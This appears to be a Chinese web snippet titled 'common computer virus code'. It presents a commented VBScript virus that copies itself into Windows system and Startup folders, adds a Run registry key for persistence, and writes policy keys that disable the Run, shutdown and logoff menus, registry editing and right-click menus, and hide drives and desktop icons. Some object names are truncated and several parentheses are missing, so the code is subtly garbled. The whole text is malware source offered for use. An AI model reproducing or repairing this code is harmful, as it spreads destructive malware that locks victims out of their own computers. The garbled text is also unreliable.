常用的电脑病毒代码

on error resume next
set fs=createobject("ing.filesystemobject" '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作
set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置
set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置
set so=createobject("ing.filesystemobject"
dim r '定义一个变量
set r=createobject("w.shell"
so.getfile(w.fullname).copy(dir1&"\win32system.vbs" '复制病毒副本到windows/winnt文件夹位置
so.getfile(w.fullname).copy(dir2&"\win32system.vbs" '复制病毒副本到system32/system文件夹位置
so.getfile(w.fullname).copy(dir1&"\start menu\programs\启动\win32system.vbs" '复制病毒副本到start menu启动菜单
'下面是对注册表的恶意修改和简单的依靠oe传播
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注册表，禁止“运行”菜单
r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注册表，禁止“关闭”菜单
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注册表，隐藏所有逻辑盘符
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注册表，禁止注册表编辑
r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注册表，禁止开机注册表扫描
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注册表，禁止“注销”菜单
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注册表，禁止ms-dos实模式
r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注册表，使这个脚本本身开机自动运行
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注册表，禁止显示桌面图标
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注册表，禁止纯dos模式
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注册表，禁止“任务栏和开始”菜单
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注册表，禁止右键菜单